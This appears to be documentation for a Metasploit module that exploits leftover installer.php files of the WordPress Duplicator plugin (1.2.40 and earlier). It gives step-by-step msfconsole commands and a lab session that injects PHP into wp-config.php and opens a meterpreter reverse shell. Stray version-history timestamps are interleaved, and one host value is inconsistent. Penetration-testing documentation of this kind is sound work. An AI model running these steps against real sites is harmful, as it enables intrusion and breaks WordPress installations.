2018-11-29 15:02:03 +01:00
Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
2018-11-14 16:39:42 +01:00
* An ZIP archive with the complete WordPress files and Duplicator specific files:
2018-11-29 15:02:03 +01:00
* A copy of the `installer.php` script: `installer-backup.php`
* A SQL script that will be used to restore the database content: `database.sql`
* An installer PHP script to restore the archive `installer.php`
2018-11-14 16:39:42 +01:00
2018-11-29 15:02:03 +01:00
When the `installer.php` completes its process, the following files remain in the directory and has to be manually deleted:
2018-11-14 16:39:42 +01:00
* The ZIP archive
2018-11-29 15:02:03 +01:00
* `database.sql`
* `installer-backup.php`
* `installer-data.sql`
* `installer-log.txt`
* `installer.php`
2018-12-04 18:42:54 +01:00
WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance.
2018-11-14 16:39:42 +01:00
## Vulnerable application
2018-11-29 15:02:03 +01:00
Install a vulnerable version of [WordPress Duplicator (<= 1.2.40) ](https://downloads.wordpress.org/plugin/duplicator.1.2.40.zip ) and create a backup.
Put the `install.php` and archive files on a clean web server.
2018-11-14 16:39:42 +01:00
## Verification Steps
2018-11-29 15:02:03 +01:00
Confirm that functionality works:
1. Start `msfconsole`
2018-12-04 18:42:54 +01:00
2. `use exploit/multi/php/wordpress_duplicator`
2018-11-29 15:02:03 +01:00
3. Set the `RHOST` .
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
6. Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
7. Set `LHOST` and `LPORT`
8. Run the exploit: `run`
9. Confirm you have now a meterpreter session
2018-11-14 16:39:42 +01:00
## Options
**TARGETURI **
The path to the installer.php file to exploit By default, the path is `/installer.php` .
## Scenarios
2018-12-04 18:42:54 +01:00
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
2018-11-14 16:39:42 +01:00
```
msf5 > use exploit/multi/php/wordpress_duplicator
2018-11-29 15:02:03 +01:00
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
2018-11-14 16:39:42 +01:00
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
2018-11-29 15:02:03 +01:00
[*] Sending stage (37775 bytes) to 1.1.1.1
2018-11-14 16:39:42 +01:00
meterpreter > sysinfo
Computer : debian
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
```
